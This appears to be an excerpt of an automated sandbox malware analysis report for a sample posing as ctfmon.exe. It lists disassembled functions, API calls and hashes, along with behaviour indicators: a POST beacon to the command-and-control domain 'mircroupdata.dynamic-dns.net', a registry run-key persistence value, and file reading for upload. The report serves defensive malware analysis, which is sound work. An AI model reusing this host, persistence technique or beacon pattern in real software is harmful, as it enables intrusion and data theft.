        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Version$ComputerNameTimegethostbynamegethostnametime
        • String ID: SP%d$%3dD:%2dH:%2dM$%d.%d.%d.%d$<$<`/#v$Windows 2000$Windows 7$Windows 8$Windows Home Server$Windows Server 2003$Windows Server 2003 R2$Windows Server 2008$Windows Server 2008 R2$Windows Server 2012$Windows Vista$Windows XP$Windows XP Professional x64
        • API String ID: 855337075-699715364
        • Opcode ID: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
        • Instruction ID: bdf93ca89eb0b6f63a75df1cd038082309c9780f61bd84f6bf5dbb40301ebfc2
        • Opcode Fuzzy Hash: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
        • Instruction Fuzzy Hash: E4A1C731608345ABC724CE24C8406AFBBE6AFC5310F544A3EF549DB3D0DB78DA49875A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 380 42131a-421347 call 40dec0 call 4283ee 385 421367-421369 380->385 386 421349-421365 call 4283ee FindResourceW LoadResource 380->386 388 421375-421379 385->388 389 42136b-421372 LockResource 385->389 386->385 391 421383-42139a call 42129e call 4220e2 388->391 392 42137b-42137e 388->392 389->388 398 4213ba-4213d9 call 422096 call 421c35 call 42102b 391->398 399 42139c-4213a7 IsWindowEnabled 391->399 393 42146b-421479 392->393 407 4213db-4213df 398->407 408 42142d-421434 398->408 399->398 400 4213a9-4213b3 EnableWindow 399->400 400->398 411 4213e1-4213ee call 424202 407->411 412 4213fb-4213fe 407->412 409 421441-421444 408->409 410 421436-42143b EnableWindow 408->410 414 421446-42144f GetActiveWindow 409->414 415 42145a-421468 call 4212d8 409->415 410->409 422 4213f3-4213f6 call 423c3c 411->422 423 4213f0-4213f2 411->423 412->408 413 421400-421411 call 424319 412->413 413->408 414->415 418 421451-421454 SetActiveWindow 414->418 415->393 418->415 422->412 423->422
        APIs
        • __EH_prolog.LIBCMT ref: 0042131F
        • FindResourceW.KERNEL32(?,00000000,00000005,?,?,?,?,?,?,?,?,00000000), ref: 00421357
        • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042135F
          • Part of subcall function 004220E2: UnhookWindowsHookEx.USER32(?), ref: 00422107
        • LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0042136C
        • IsWindowEnabled.USER32(?), ref: 0042139F
        • EnableWindow.USER32(?,00000000), ref: 004213AD
        • EnableWindow.USER32(?,00000001), ref: 0042143B
        • GetActiveWindow.USER32 ref: 00421446
        • SetActiveWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00421454
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
        • String ID:
        • API String ID: 401145483-0
        • Opcode ID: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
        • Instruction ID: 784f444dc76e6990419508fd16e063a3552bb93fd24097b854aee613197a0977
        • Opcode Fuzzy Hash: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
        • Instruction Fuzzy Hash: 9B41C030B00A24DBDB21AB65E885A7FB7B5FF54705F90011BF902A22A1CB798941CA69
        APIs
        • __EH_prolog.LIBCMT ref: 0042297A
        • GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 00422B2D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: H_prologVersion
        • String ID:
        • API String ID: 1836448879-0
        • Opcode ID: 27f1f03a74d78de30f97ea9d1cf75bd2c7dd32f017002826f89400c0ae325eed
        • Instruction ID: 097fcd5e74c8d1fde8cafafb4e683d868b573153c364305f64f98f5cddaff1ce
        • Opcode Fuzzy Hash: 27f1f03a74d78de30f97ea9d1cf75bd2c7dd32f017002826f89400c0ae325eed
        • Instruction Fuzzy Hash: 85E1A170700229FBDB14DF15EE80ABE77A9AF04314F90451AF816EB251CBBCD912E769
        APIs
        • GetAdaptersInfo.IPHLPAPI ref: 00403563
        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00403586
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AdaptersInfo
        • String ID:
        • API String ID: 3177971545-0
        • Opcode ID: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
        • Instruction ID: 6b7a8a9e45624f5e4ac54a2b774ff4b4d77386f4916c747b8fc9f6bd6b467c43
        • Opcode Fuzzy Hash: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
        • Instruction Fuzzy Hash: F911C6B16003046BDB14EE629CC196B77DCEBC4715F04493EF9099B286EB39ED098766

        Control-flow Graph

        APIs
        • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00402C18
        • Sleep.KERNEL32(00001388), ref: 00402C2C
        • InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000003), ref: 00402C42
        • InternetCloseHandle.WININET(00CC0008), ref: 00402C53
        • Sleep.KERNEL32(00001388), ref: 00402C5A
        • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,84400100,00000004), ref: 00402C76
        • InternetCloseHandle.WININET(00CC0010), ref: 00402C88
        • InternetCloseHandle.WININET(00CC0008), ref: 00402C90
        • Sleep.KERNEL32(00001388), ref: 00402C97
        • InternetSetOptionA.WININET(00000000,00000005,0000000A,00000004), ref: 00402CA8
        • ResetEvent.KERNEL32(0000034C), ref: 00402CB5
        • WaitForSingleObject.KERNEL32(0000034C,000000FF), ref: 00402CCF
        • WaitForSingleObject.KERNEL32(00000350,000000FF), ref: 00402CDA
        • ResetEvent.KERNEL32(00000354), ref: 00402CE3
        • SetEvent.KERNEL32(00000348,?,A0000000,?,?,A0000000), ref: 00402CFB
        • SetEvent.KERNEL32(00000348), ref: 00402D13
        • HttpAddRequestHeadersA.WININET(00CC0014,?,?,A0000000), ref: 00402D9A
        • HttpAddRequestHeadersA.WININET(00CC0014,?,?,A0000000), ref: 00402E95
        • HttpSendRequestA.WININET(00CC0014,00000000,00000000,004BC7C4,00000000), ref: 00402EAE
        • InternetReadFile.WININET(00CC0014,0043C7C4,000186A0,?), ref: 00402ED4
        • GetLastError.KERNEL32(?,A0000000,?,?,A0000000), ref: 00402EEA
        • SetEvent.KERNEL32(00000354,?,A0000000,?,?,A0000000), ref: 00402F05
        • ResetEvent.KERNEL32(0000034C,?,A0000000,?,?,A0000000), ref: 00402F12
        Strings
        • item.asp?spm=xx{}:>*()_!, xrefs: 00402BAF
        • POST, xrefs: 00402C70
        • mircroupdata.dynamic-dns.net, xrefs: 00402C3C
        • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), xrefs: 00402C13
        • Content-Length: %u, xrefs: 00402E66
        • Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+, xrefs: 00402D64
        • PTPM, xrefs: 00402DA1
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Internet$Event$HttpRequest$CloseHandleResetSleep$HeadersObjectOpenSingleWait$ConnectErrorFileLastOptionReadSend
        • String ID: Content-Length: %u$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$POST$PTPM$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$item.asp?spm=xx{}:>*()_!$mircroupdata.dynamic-dns.net
        • API String ID: 3227742456-1989333268
        • Opcode ID: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
        • Instruction ID: 5521d0e7914338b547ae66bed9a7008d46125a5347177c733f9cd849099ed627
        • Opcode Fuzzy Hash: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
        • Instruction Fuzzy Hash: 3291E672740302ABD714DB64EC85F2B3BA9EB98B00F50452DF905B73D1DBB8E8059B69

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 125 404620-4047a8 GetCommandLineA call 4248ad call 41f9b6 WideCharToMultiByte 130 4047aa-4047b9 125->130 130->130 131 4047bb-4047e1 RegOpenKeyExA GetLastError 130->131 132 4047f3-404819 RegQueryValueExA 131->132 133 4047e3-4047ee 131->133 135 404838-40485e 132->135 136 40481b-40481e 132->136 134 4048ab-4048cb call 424739 133->134 137 404860-404871 135->137 138 404873-404893 RegSetValueExA 135->138 136->135 140 404820-404836 RegCloseKey 136->140 137->138 141 404899-4048a4 RegCloseKey 137->141 138->141 140->134 141->134
        APIs
        • GetCommandLineA.KERNEL32 ref: 0040468A
          • Part of subcall function 004248AD: lstrlenA.KERNEL32(004058A3,?,?,?,004058A3,?), ref: 004248BB
        • WideCharToMultiByte.KERNEL32(00000000,00000000,76945540,?,?,00000104,00000000,00000000,00000022,00000000), ref: 004046C0
        • RegOpenKeyExA.KERNEL32(80000001,0000001D,00000000,000F003F,?), ref: 004047D1
        • GetLastError.KERNEL32 ref: 004047D9
        • RegQueryValueExA.KERNEL32(0000001D,ctfmon.exe,00000000,00000000,00000000,00000104), ref: 00404811
        • RegCloseKey.ADVAPI32(?), ref: 00404825
        • RegSetValueExA.KERNEL32(?,ctfmon.exe,00000000,00000001,?,0000001C), ref: 00404893
        • RegCloseKey.KERNEL32(?), ref: 0040489E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CloseValue$ByteCharCommandErrorLastLineMultiOpenQueryWidelstrlen
        • String ID: '$'$'$($*$+$+$-$9$:$:$;$;$=$=$=$ctfmon.exe
        • API String ID: 3300019627-3918993357
        • Opcode ID: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
        • Instruction ID: aab2ec02df40a054bcdff1db174f22e23601e58f66f7115433a06adc50c1c808
        • Opcode Fuzzy Hash: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
        • Instruction Fuzzy Hash: 9D814B7120D3C0DED322CB689888B9FBFD4ABE6308F48495DF1D557282C6B99509C767

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 143 404150-40419f VirtualAlloc * 2 144 4041a3-4041aa 143->144 145 4041ac-4041c3 Sleep 144->145 146 40421e-40424d WaitForSingleObject ResetEvent 144->146 147 404215-40421c 145->147 148 4041c5-4041d0 145->148 149 404285-4042c2 call 40dbbf CreateFileW 146->149 150 40424f-404280 SetEvent Sleep 146->150 147->145 147->146 148->147 151 4041d2-404213 call 402f20 148->151 156 4042c8-4042e3 CreateFileW 149->156 157 4043a9-404406 GetFileSize call 40dc10 SetFilePointer ReadFile CloseHandle 149->157 150->144 151->147 156->157 158 4042e9-404392 call 420e3f call 402f20 call 420e68 156->158 163 404408-404429 157->163 164 40442e-4044f9 call 4045e0 SetEvent 157->164 166 404393-4043a4 SetEvent Sleep 158->166 163->166 169 4041a1 164->169 172 4044ff 164->172 166->169 169->144 173 404505-404534 172->173 175 404536 173->175 176 404538-404587 call 402f20 Sleep 173->176 175->176 179 404501 176->179 180 40458d 176->180 179->173 180->169
        APIs
        • VirtualAlloc.KERNEL32(00000000,0007A120,00001000,00000004), ref: 0040416F
        • VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 00404182
        • Sleep.KERNEL32(00001388), ref: 004041B1
        • WaitForSingleObject.KERNEL32(00000344,00007530), ref: 0040422D
        • ResetEvent.KERNEL32(00000344), ref: 0040423A
        • SetEvent.KERNEL32(00000344), ref: 0040426F
        • Sleep.KERNEL32(000003E8), ref: 0040427A
        • CreateFileW.KERNEL32(0053CDF8,10000000,00000003,00000000,00000003,00000000,00000000), ref: 004042BB
        • CreateFileW.KERNEL32(0053CDF8,10000000,00000001,00000000,00000003,00000000,00000000), ref: 004042DC
          • Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(00000348,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
          • Part of subcall function 00402F20: ResetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F47
          • Part of subcall function 00402F20: SetEvent.KERNEL32(0000034C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
          • Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(0000034C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
          • Part of subcall function 00402F20: Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
          • Part of subcall function 00402F20: SetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F9E
        • SetEvent.KERNEL32(00000344), ref: 00404393
        • Sleep.KERNEL32(000003E8), ref: 0040439E
        • GetFileSize.KERNEL32(00000000,?), ref: 004043AF
        • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,0007A120,00000000), ref: 004043DE
        • ReadFile.KERNEL32(00000000,?,0007A120,?,00000000), ref: 004043F5
        • CloseHandle.KERNEL32(00000000), ref: 004043FC
        • SetEvent.KERNEL32 ref: 004044ED
        • Sleep.KERNEL32(000000C8,?,00000344), ref: 0040457D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Event$FileSleep$ObjectSingleWait$AllocCreateResetVirtual$CloseHandlePointerReadSize
        • String ID: +*&=^^^^--------DW+ER$+*&=^^^^--------DW+FI$+*&=^^^^--------DWRST
        • API String ID: 72173714-2046355071
        • Opcode ID: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
        • Instruction ID: 68a225615deaf7f64b5cd94b1301c96557090b2748eeb4ce9f12d3137a3e3624
        • Opcode Fuzzy Hash: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
        • Instruction Fuzzy Hash: C1C1AE71A04704AFD714DF24EC84A1BBBE5FBD8700F40492DFA45AB390DB78A909CBA5

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 181 421ef2-421f11 call 428c05 184 421f13-421f25 CallNextHookEx 181->184 185 421f2a-421f48 call 4283ee 181->185 186 421fdd-421fdf 184->186 189 421fe2-422005 call 421c7a 185->189 190 421f4e-421f55 185->190 205 422007-42200b 189->205 206 42207a-42208d call 421d11 SetWindowLongW 189->206 192 421f57-421f59 190->192 193 421fb5-421fca CallNextHookEx 190->193 192->193 197 421f5b-421f69 GetWindowLongW 192->197 194 421fd9-421fdc 193->194 195 421fcc-421fd5 UnhookWindowsHookEx 193->195 194->186 195->194 197->193 198 421f6b-421f7a GetPropW 197->198 198->193 200 421f7c-421f92 SetPropW GetPropW 198->200 200->193 201 421f94-421fa4 GlobalAddAtomW 200->201 202 421fa6 201->202 203 421fab-421faf SetWindowLongW 201->203 202->203 203->193 205->206 208 42200d-422015 205->208 213 42206e-422072 206->213 214 42208f-422094 206->214 210 422077 208->210 211 422017-42201b 208->211 210->206 211->210 212 42201d-422032 call 421a74 211->212 212->210 217 422034-422058 call 421d11 GetWindowLongW 212->217 213->193 214->213 221 42205a-422069 SetWindowLongW 217->221 222 42206b 217->222 221->222 222->213
        APIs
          • Part of subcall function 00428C05: TlsGetValue.KERNEL32(00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44
        • CallNextHookEx.USER32(?,00000003,?,?), ref: 00421F1F
        • GetWindowLongW.USER32(?,000000FC), ref: 00421F5E
        • GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F72
        • SetPropW.USER32(?,AfxOldWndProc423,00000003), ref: 00421F81
        • GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F89
        • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 00421F95
        • SetWindowLongW.USER32(?,000000FC,Function_00021E76), ref: 00421FAF
        • CallNextHookEx.USER32(?,00000003,?,?), ref: 00421FBE
        • UnhookWindowsHookEx.USER32(?), ref: 00421FCF
        • GetWindowLongW.USER32(?,000000FC), ref: 0042203F
        • SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422060
        • SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422085
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: LongWindow$HookProp$CallNext$AtomGlobalUnhookValueWindows
        • String ID: 8qj$AfxOldWndProc423
        • API String ID: 3289694481-3161831504
        • Opcode ID: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
        • Instruction ID: 3bbe1058c676c252dc3c84ad706e6ee6a953ffd8e3112ba2f7a94efb76d52b7d
        • Opcode Fuzzy Hash: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
        • Instruction Fuzzy Hash: B3518131700124EBCB219F65ED88BAE7B74FF19750F61816AFD159A2A1C7788A01CB98

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 223 4238e8-423903 call 424202 226 423905-423908 223->226 227 42390a-42390e 223->227 228 423942-423955 GetWindowRect 226->228 229 423910-423919 GetParent 227->229 230 42391b-423920 GetWindow 227->230 231 4239e6-423a0d GetParent GetClientRect * 2 MapWindowPoints 228->231 232 42395b-42395d 228->232 233 423926-42392a 229->233 230->233 236 423a13-423a52 231->236 234 423978-423981 232->234 235 42395f-42396d GetWindowLongW 232->235 233->228 237 42392c-42393e SendMessageW 233->237 240 423983-42398a call 405110 234->240 241 4239bd-4239e4 GetWindowRect call 405b9b call 405c06 CopyRect 234->241 238 423976 235->238 239 42396f-423974 235->239 242 423a54-423a57 236->242 243 423a59-423a60 236->243 237->228 244 423940 237->244 238->234 239->234 239->238 254 42398f-4239bb call 405b9b call 405c06 CopyRect * 2 240->254 255 42398c 240->255 241->236 247 423a6a-423a6d 242->247 243->247 248 423a62-423a68 243->248 244->228 251 423a74-423a79 247->251 252 423a6f-423a72 247->252 248->247 256 423a84-423a91 call 424319 251->256 257 423a7b-423a81 251->257 252->256 254->236 255->254 262 423a96-423a9a 256->262 257->256
        APIs
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        • GetParent.USER32(?), ref: 00423913
        • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 00423936
        • GetWindowRect.USER32(?,?), ref: 0042394F
        • GetWindowLongW.USER32(00000000,000000F0), ref: 00423962
        • CopyRect.USER32(?,?), ref: 004239AF
        • CopyRect.USER32(?,?), ref: 004239B9
        • GetWindowRect.USER32(00000000,?), ref: 004239C2
          • Part of subcall function 00405B9B: MonitorFromWindow.USER32(?,?), ref: 00405BB0
          • Part of subcall function 00405C06: GetMonitorInfoW.USER32(?,?), ref: 00405C1D
        • CopyRect.USER32(?,?), ref: 004239DE
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
        • String ID:
        • API String ID: 1450647913-0
        • Opcode ID: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
        • Instruction ID: ccb8daffb7cbfa52e4fbfdfbb8d48ca0ec0013079dd18dece64f2212521eac76
        • Opcode Fuzzy Hash: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
        • Instruction Fuzzy Hash: 9151A671B00229AFDB10DFA8EC85EEEB7B9AF44314F544166F501F3280D678EE458B58

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 265 42102b-421048 call 40dec0 268 421055-42107f call 4283ee call 423e7e * 2 265->268 269 42104a-421052 call 4283ee 265->269 278 421081-421091 268->278 279 4210a8-4210ab 268->279 269->268 280 421240-421242 278->280 286 421097-4210a5 278->286 279->280 281 4210b1-4210de call 42522d 279->281 283 421247-421255 280->283 287 421133-421167 call 42507c call 42538c call 425119 call 42510b 281->287 288 4210e0-4210ea GetSystemMetrics 281->288 286->279 292 421175-421188 call 422096 287->292 319 421169-421172 GlobalLock 287->319 291 4210f0-421101 call 40e246 288->291 288->292 300 421103-421114 call 40e246 291->300 301 421129-42112e 291->301 302 42118a-42118c 292->302 303 42118e 292->303 300->301 313 421116-421127 call 40e246 300->313 301->287 305 421130 301->305 304 421191-4211ad CreateDialogIndirectParamW call 424739 302->304 303->304 311 4211b2-4211d7 304->311 305->287 317 4211f4-4211fb call 4220e2 311->317 318 4211d9-4211e7 311->318 313->292 313->301 325 421207-42120a 317->325 326 4211fd-4211ff 317->326 318->317 324 4211e9-4211ec 318->324 319->292 324->317 327 42121e-421221 325->327 328 42120c-421210 325->328 326->325 330 421223-42122f GlobalUnlock GlobalFree 327->330 331 421235-421238 327->331 328->327 329 421212-42121b DestroyWindow 328->329 329->327 330->331 332 421244-421246 331->332 333 42123a-42123e 331->333 332->283 333->280 333->332
        APIs
        • __EH_prolog.LIBCMT ref: 00421030
        • GetSystemMetrics.USER32(0000002A), ref: 004210E2
        • GlobalLock.KERNEL32(?), ref: 0042116C
        • CreateDialogIndirectParamW.USER32(?,?,?,Function_00020E73,00000000), ref: 0042119E
          • Part of subcall function 00424739: InterlockedDecrement.KERNEL32(?), ref: 0042474D
        • DestroyWindow.USER32(00000000,?,?,00000000,?,?), ref: 00421215
        • GlobalUnlock.KERNEL32(?), ref: 00421226
        • GlobalFree.KERNEL32(?), ref: 0042122F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
        • String ID: Helv$MS Sans Serif$MS Shell Dlg
        • API String ID: 2343056566-2894235370
        • Opcode ID: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
        • Instruction ID: 7206d5c3c7dbf20e32f5d3ed2ca5f4a347ebefc87342b6247bb12fda8d74ee15
